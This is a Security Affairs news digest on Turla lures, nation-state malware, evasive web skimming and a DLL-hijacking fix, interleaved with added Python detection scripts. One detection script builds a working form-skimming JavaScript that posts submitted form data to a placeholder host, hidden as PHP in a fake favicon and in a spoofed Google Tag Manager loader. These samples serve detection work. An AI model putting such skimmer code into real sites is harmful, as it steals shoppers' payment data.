Security Affairs, 24 May 2022

Russia-linked Turla APT targets Austria, Estonia, and NATO platform

23 May 2022 at 22:03

Russia-linked APT group Turla was observed targeting the Austrian Economic Chamber, a NATO eLearning platform, and the Baltic Defense College.

Researchers from SEKOIA.IO Threat & Detection Research (TDR) team have uncovered a reconnaissance and espionage campaign conducted by Russia-linked Turla APT aimed at the Baltic Defense College, the Austrian Economic Chamber (involved in government decision-making such as economic sanctions) and NATO’s eLearning platform JDAL (Joint Advanced Distributed Learning).

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2004, targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and also includes the Pentagon, the Swiss defense firm RUAG, US Department of State, European government entities and the US Central Command.

SEKOIA researchers started their investigation after Google’s Threat Analysis Group (TAG) published the report “Update on cyber activity in Eastern Europe”, which detailed the activity of nation-state actors against Eastern European targets.

The researchers pivoted on Turla’s infrastructure starting from the domains listed in the TAG report:

  • wkoinfo.webredirect[.]org
  • jadlactnato.webredirect[.]org

The first domain resolved to 45.153.241[.]162, an IP address that can be linked to the domain baltdefcol.webredirect[.]org, which typosquats www.baltdefcol.org, the Baltic Defense College’s website.

Experts found the Word document “War Bulletin April 27, 19:00 CET” in every directory of the server. The document references an external PNG file named logo.png, which was not reachable at the time of the investigation.

The document does not contain any malicious macro, which suggests that the remote PNG is used for reconnaissance: opening the document makes Word fetch the image from the attacker-controlled server.

“It is quite interesting that the request to the file is performed via the HTTP protocol and not an SMB inclusion. Therefore, this campaign does not leverage any malicious code but has been used for reconnaissance purposes only.” reads the analysis published by the experts. “Thanks to the HTTP request done by the document to its own controlled server, the attacker can get the version and the type of Word application used by the victim – which can be interesting info to send a tailored exploit for the specific Microsoft Word version. Moreover, the attacker can grab the IP address of the victim which can be also an interesting selector to monitor the victim’s communications via TURLA’s SIGINT capabilities.”

The researchers shared Indicators of Compromise (IoCs) for these attacks along with a YARA rule.
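The recon trick described above relies on an OOXML relationship with TargetMode="External": Word follows the target when the document is opened, so the server sees the victim's IP address and a User-Agent carrying the Word version. The following triage helper is an added example, not SEKOIA's code: it lists every external relationship in a .docx, says whether Word would fetch it over HTTP (a web beacon) or SMB (a UNC/file:// path, which can also leak an NTLM handshake), and checks which image relationships are referenced via r:link rather than r:embed. The sample package it builds is constructed; tracker.example.invalid is a placeholder, not one of the campaign's domains, and the drawing markup is simplified to the blip element.

```python
"""List external relationships in a .docx (added triage example, not SEKOIA's code).

Word resolves TargetMode="External" relationships when the document is opened;
an http(s) target becomes a web request that reveals the client's IP and Word
version, a UNC or file:// target becomes an SMB request. Sample data below is
constructed; tracker.example.invalid is a placeholder."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def classify_target(target):
    """Protocol Word would use to reach an external target."""
    t = target.strip().lower()
    if t.startswith(("http://", "https://")):
        return "http-beacon"
    if t.startswith(("file://", "\\\\", "//")):
        return "smb-unc"
    return "other"


def external_relationships(docx_bytes):
    """Every TargetMode="External" relationship in any *.rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "category": classify_target(target),
                })
    return findings


def linked_image_ids(docx_bytes):
    """Relationship Ids used via r:link (picture fetched on open) rather than
    r:embed (picture stored inside the package)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        xml = zf.read("word/document.xml").decode("utf-8", "replace")
    return set(re.findall(r'r:link="([^"]+)"', xml))


def build_sample_docx():
    """Constructed sample: one embedded image and one image linked to a remote
    server. The drawing markup is reduced to the a:blip element."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        'Target="media/image1.png"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        'Target="http://tracker.example.invalid/logo.png" TargetMode="External"/>'
        '</Relationships>'
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:body><w:p><w:r><w:drawing><a:blip r:embed="rId1"/></w:drawing></w:r>'
        '<w:r><w:drawing><a:blip r:link="rId2"/></w:drawing></w:r></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels)
        zf.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    linked = linked_image_ids(sample)
    for f in external_relationships(sample):
        fetched = "fetched on open" if f["id"] in linked else "not referenced as r:link"
        print(f"{f['part']}: {f['id']} {f['type']} -> {f['target']} [{f['category']}, {fetched}]")
```

Run it against a real sample by replacing build_sample_docx() with the file's bytes; a document with no macros but an http-beacon or smb-unc finding is exactly the profile of the “War Bulletin” lure, and the smb-unc case is the variant SEKOIA notes this campaign did not use.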

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, domain name system)

The post Russia-linked Turla APT targets Austria, Estonia, and NATO platform appeared first on Security Affairs.

Nation-state malware could become a commodity on dark web soon, Interpol warns

24 May 2022 at 09:06

Interpol Secretary General Jurgen Stock warns that nation-state malware will become available on the cybercrime underground within a couple of years.

Interpol Secretary General Jurgen Stock declared that nation-state malware will become available on the darknet in a couple of years.

In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state and non-state actors represents a serious risk for critical infrastructure and organizations worldwide.

Threat actors could reverse engineer military-grade malicious code and use their own versions in attacks in the wild. The scenario also opens the door to false flag operations: nation-state actors could obtain cyber weapons used in the conflict and deploy them in attacks in the wild, making attribution extremely difficult.

“That is a major concern in the physical world — weapons that are used on the battlefield and tomorrow will be used by organized crime groups,” said Jurgen Stock, the Interpol secretary general during a CNBC-moderated panel at the World Economic Forum in Davos, Switzerland, Monday.

“The same applies for the digital weapons that, maybe today are used by the military, developed by military, and tomorrow will be available for criminals,” he explained.

During the first couple of months after the Russian invasion of Ukraine, security firms observed multiple attacks against Ukrainian government entities and organizations. Russia-linked APT groups used wipers to destroy the target systems; in some cases, these attacks also hit companies operating in other regions, as in the Viasat case.

Early this month, the European Union accused Russia of the cyberattack that hit the satellite KA-SAT network in Ukraine, operated by Viasat, on February 24.

This cyberattack caused communication outages and disruptions in Ukraine and also impacted several EU Member States: 5,800 Enercon wind turbines in Germany became unreachable due to the spillover from this attack. Security researchers at SentinelLabs who investigated the attack spotted a previously undetected destructive wiper, tracked as AcidRain, that hit routers and modems.

Stock urged strong cooperation between governments and law enforcement authorities to prevent nation-state malware from proliferating on the dark web.

“On the one hand, we are aware of what’s going on — on the other hand, we need the data, which are in the private sector,” Stock said. “We need your [cyber breach] reports. Without your reports, we are blind.”

“That is a gap we need to close together, not just law enforcement that require that we build bridges between our siloes, the islands of information.”

Critical infrastructure and supply chains are the most exposed; it is essential to raise their level of security.


Pierluigi Paganini

(SecurityAffairs – hacking, nation-state malware)

The post Nation-state malware could become a commodity on dark web soon, Interpol warns appeared first on Security Affairs.

Microsoft warns of new highly evasive web skimming campaigns

24 May 2022 at 13:16

Threat actors behind web skimming campaigns are using malicious JavaScript to mimic Google Analytics and Meta Pixel scripts to avoid detection.

Microsoft security researchers recently observed web skimming campaigns that used multiple obfuscation techniques to avoid detection.

The threat actors obfuscated the skimming script by encoding it in PHP, which in turn was embedded in an image file; with this trick the code is executed when the website’s index page is loaded.

The experts also observed compromised web applications injected with malicious JavaScript masquerading as Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts. Some skimming scripts also included anti-debugging mechanisms.

The term web skimming refers to the criminal practice of harvesting the payment information of a website’s visitors during checkout. Crooks typically exploit vulnerabilities in e-commerce platforms and CMSs to inject the skimming script into the pages of the e-store. In some cases, attackers exploit vulnerabilities in installed third-party plugins and themes to inject the malicious scripts.


“During our research, we came across two instances of malicious image files being uploaded to a Magento-hosted server. Both images contained a PHP script with a Base64-encoded JavaScript, and while they had identical JavaScript code, they slightly differed in their PHP implementation.” reads the analysis published by Microsoft. “The first image, disguised as a favicon (also known as a shortcut or URL icon), was available on VirusTotal, while the other one was a typical web image file discovered by our team.”

Microsoft also observed attackers masquerading as Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts to avoid raising suspicion.

The attackers place a Base64-encoded string inside spoofed Google Tag Manager code. This string decodes to trafficapps[.]business/data[.]php?p=form.

Encoded skimming script in a spoofed Google Analytics code (Source: Microsoft)

Experts noticed that the attackers behind the Meta Pixel spoofing used newly registered domains (NRDs) served over HTTPS.
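Both evasion tricks Microsoft describes (PHP with a Base64-encoded JavaScript payload hidden inside an image file, and a Google Tag Manager look-alike whose only oddity is a Base64 string that decodes to a URL) can be caught with two small content checks. The script below is an added example, not Microsoft's code: it flags an image whose bytes also contain a PHP open tag and decodes any base64_decode('...') argument it finds, and it scans a script block for Base64 runs that decode to something URL-shaped. The fake favicon, the skimmer snippet, the GTM-XXXX container id and the example.invalid URL are all constructed samples, not indicators from the report.

```python
"""Two web-skimmer content checks (added example, not Microsoft's code):
PHP hidden in an image file, and Base64-wrapped URLs in a spoofed GTM loader.
All samples below are constructed; example.invalid is a placeholder."""
import base64
import binascii
import re
import string

IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg",
               b"GIF87a": "gif", b"GIF89a": "gif", b"\x00\x00\x01\x00": "ico"}
PHP_TAG = re.compile(rb"<\?php\b|<\?=")
B64_ARG = re.compile(rb"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_LIKE = re.compile(r"^(?:https?:)?(?://)?[a-z0-9.-]+\.[a-z]{2,}(?:[/?#]\S*)?$", re.I)
PRINTABLE = set(string.printable)


def image_type(data):
    """Container type by magic bytes, or None if the blob is not an image."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def decode_printable_base64(blob):
    """Strict Base64 decode; returns text only if the result is printable ASCII."""
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if set(text) <= PRINTABLE else None


def scan_image_for_php(data):
    """Flag an image that also carries a PHP open tag, and decode any
    base64_decode('...') arguments to expose the JavaScript the PHP would emit."""
    kind = image_type(data)
    has_php = PHP_TAG.search(data) is not None
    payloads = []
    for m in B64_ARG.finditer(data):
        decoded = decode_printable_base64(re.sub(rb"\s", b"", m.group(1)))
        if decoded:
            payloads.append(decoded)
    return {"image_type": kind, "has_php": has_php, "payloads": payloads,
            "suspicious": kind is not None and has_php}


def base64_urls_in_script(script):
    """Base64 runs in a script that decode to something URL-shaped; a genuine
    GTM/GA loader has no reason to hide its script source this way."""
    hits = []
    for m in B64_RUN.finditer(script):
        decoded = decode_printable_base64(m.group(0))
        if decoded and URL_LIKE.match(decoded.strip()):
            hits.append(decoded.strip())
    return hits


# --- constructed samples (not real indicators) -----------------------------
EXFIL_URL = "https://example.invalid/data.php?p=form"
SKIMMER_JS = ("document.addEventListener('submit',function(e){fetch('%s',"
              "{method:'POST',body:new FormData(e.target)})});" % EXFIL_URL)
# A fake favicon: ICO header bytes followed by PHP that echoes the skimmer.
FAKE_FAVICON = (b"\x00\x00\x01\x00" + b"\x00" * 32
                + b"<?php echo base64_decode('"
                + base64.b64encode(SKIMMER_JS.encode()) + b"'); ?>")
# A Google Tag Manager look-alike whose script src comes out of atob().
SPOOFED_GTM = """<script>
(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src=atob('%s');f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXX');
</script>""" % base64.b64encode(EXFIL_URL.encode()).decode()

if __name__ == "__main__":
    print(scan_image_for_php(FAKE_FAVICON))
    print(base64_urls_in_script(SPOOFED_GTM))
```

The image check deliberately ignores where the PHP sits: an appended PHP block leaves the magic bytes intact, so a file that still opens as a valid favicon can carry the whole skimmer. The script check is a heuristic and will surface benign Base64 data URLs too, so treat a hit as a lead for review rather than a verdict.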

“Given the increasingly evasive tactics employed in skimming campaigns, organizations should ensure that their e-commerce platforms, CMSs, and installed plugins are up to date with the latest security patches and that they only download and use third-party plugins and services from trusted sources,” Microsoft concludes.


Pierluigi Paganini

(SecurityAffairs – hacking, web skimming attacks)

The post Microsoft warns of new highly evasive web skimming campaigns appeared first on Security Affairs.

Trend Micro addressed a flaw exploited by China-linked Moshen Dragon APT

24 May 2022 at 18:18

Trend Micro addressed a DLL hijacking issue in Trend Micro Security actively exploited by a China-linked threat group to deploy malware.

Trend Micro addressed a DLL hijacking flaw in Trend Micro Security that a China-linked threat actor actively exploited to deploy malware.

In early May, SentinelOne researchers observed a China-linked APT group, tracked as Moshen Dragon, targeting the telecommunication sector in Central Asia with ShadowPad and PlugX malware.

Experts observed an overlap between the TTPs of the Moshen Dragon group and those of the Chinese Nomad Panda (aka RedFoxtrot) group.

The researchers state that Moshen Dragon deployed five different malware triads that use DLL search order hijacking to sideload ShadowPad and PlugX variants. The cyberespionage group also uses additional tools, including an LSA notification package and the GUNTERS passive backdoor.

SentinelOne experts reported that Moshen Dragon focused on hijacking programs belonging to security vendors, including Symantec, Trend Micro, BitDefender, McAfee and Kaspersky.

The hijacked DLL is used to decrypt and load the final payload, which is stored in a file residing in the same folder.
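The sideloading triad works because of how Windows resolves a DLL that is loaded by bare name: unless the name is on the KnownDLLs list or the loader has been told otherwise, it walks a fixed list of directories and takes the first match, and with SafeDllSearchMode on (the default) the application's own directory comes before System32. The model below is an added example, not SentinelOne's code: it reproduces that documented search order, resolves a DLL name against a constructed stand-in for the disk, and runs a triage check for DLLs in an application folder that shadow a same-named DLL further down the order, together with the exe + DLL + payload-file pattern of a triad. scan.exe, helper.dll, scan.dat and the directory paths are placeholders, not the names Moshen Dragon used.

```python
"""DLL search-order hijacking modelled (added example, not SentinelOne's code).

A DLL loaded by bare name, not on the KnownDLLs list, is resolved by walking a
fixed directory list and taking the first hit. With SafeDllSearchMode on (the
default) the application directory is searched first, so a same-named DLL
dropped next to a signed vendor executable wins over the real one in System32.
All paths and file names below are constructed placeholders."""
from pathlib import PureWindowsPath


def search_order(app_dir, cwd, path_dirs, windows_dir=r"C:\Windows", safe_search=True):
    """Directory order Windows uses to resolve a DLL name (documented behaviour).
    safe_search=False reproduces the legacy order with the current directory
    ahead of the system directories."""
    sys_dirs = [windows_dir + r"\System32", windows_dir + r"\System", windows_dir]
    order = [app_dir]
    if safe_search:
        order += sys_dirs + [cwd]
    else:
        order += [cwd] + sys_dirs
    return order + list(path_dirs)


def _norm(p):
    """Normalise a Windows path for comparison (case-insensitive filesystem)."""
    return str(PureWindowsPath(p)).lower()


def resolve_dll(dll_name, order, filesystem):
    """First directory in `order` that holds `dll_name`. `filesystem` is a set
    of normalised full paths standing in for the real disk."""
    for d in order:
        candidate = _norm(PureWindowsPath(d) / dll_name)
        if candidate in filesystem:
            return candidate
    return None


def shadowed_dlls(app_dir, order, filesystem):
    """Triage check: DLLs in the application directory that pre-empt a
    same-named DLL further down the search order (the sideloading pattern)."""
    app = _norm(app_dir)
    rest = [d for d in order if _norm(d) != app]
    results = []
    for p in sorted(filesystem):
        if not p.endswith(".dll") or _norm(PureWindowsPath(p).parent) != app:
            continue
        name = PureWindowsPath(p).name
        legit = resolve_dll(name, rest, filesystem)
        if legit:
            results.append({"dll": name, "loaded": p, "shadows": legit})
    return results


def triad_in(app_dir, filesystem):
    """Files forming a sideloading triad in one folder: an executable, a DLL,
    and at least one other file that could hold the encrypted payload.
    Returns None when the folder does not match the pattern."""
    app = _norm(app_dir)
    files = sorted(p for p in filesystem if _norm(PureWindowsPath(p).parent) == app)
    exes = [p for p in files if p.endswith(".exe")]
    dlls = [p for p in files if p.endswith(".dll")]
    others = [p for p in files if not p.endswith((".exe", ".dll"))]
    if exes and dlls and others:
        return {"exe": exes, "dll": dlls, "payload_candidates": others}
    return None


# Constructed stand-in for the disk: the legitimate helper.dll lives in
# System32; a dropped triad (scan.exe, planted helper.dll, encrypted scan.dat)
# sits in a user-writable folder.
FS = {
    r"c:\windows\system32\helper.dll",
    r"c:\users\public\triad\scan.exe",
    r"c:\users\public\triad\helper.dll",
    r"c:\users\public\triad\scan.dat",
}
APP_DIR = r"C:\Users\Public\triad"

if __name__ == "__main__":
    order = search_order(APP_DIR, cwd=r"C:\Users\Public", path_dirs=[r"C:\Tools"])
    print("resolved:", resolve_dll("helper.dll", order, FS))
    for hit in shadowed_dlls(APP_DIR, order, FS):
        print("shadowed:", hit)
    print("triad:", triad_in(APP_DIR, FS))
```

The model is what makes the vendor's fix meaningful: an executable that loads its helper DLLs by absolute path, or that calls SetDefaultDllDirectories before loading, no longer consults the application directory first, so the planted DLL is never picked up. When running the shadowed_dlls check against a real host, also verify the Authenticode signature of any DLL it reports, since the triad's whole point is a legitimate signed executable next to an unsigned DLL.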

The Moshen Dragon’s activity analysis led to the discovery of several payloads uploaded to VirusTotal, some of which were the ‘PlugX Talisman variant’.


SentinelOne detailed the lateral movement, credential harvesting, and data exfiltration performed by the threat actors after gaining execution through DLL hijacking of the popular security solutions.

Trend Micro confirmed that it is aware of Moshen Dragon’s activity and its ability to exploit security solutions, including its software, to deploy malware.

“Trend Micro is aware of some research that was published on May 2, 2022, regarding a purported Central-Asian-based threat actor dubbed “Moshen Dragon” that had deployed malware clusters that attempted to hijack various popular security products, including one from Trend Micro.” reads the advisory published by Trend Micro. “For Trend Micro Security (Consumer), a fix was deployed via Trend Micro’s ActiveUpdate (AU) on May 19, 2022, and any user with an active internet connection should receive the update shortly if they have not yet already received it.”

At the time of this writing, it is not clear whether the other security vendors impacted by the issue have fixed their products.


Pierluigi Paganini

(SecurityAffairs – hacking, Moshen Dragon)

The post Trend Micro addressed a flaw exploited by China-linked Moshen Dragon APT appeared first on Security Affairs.
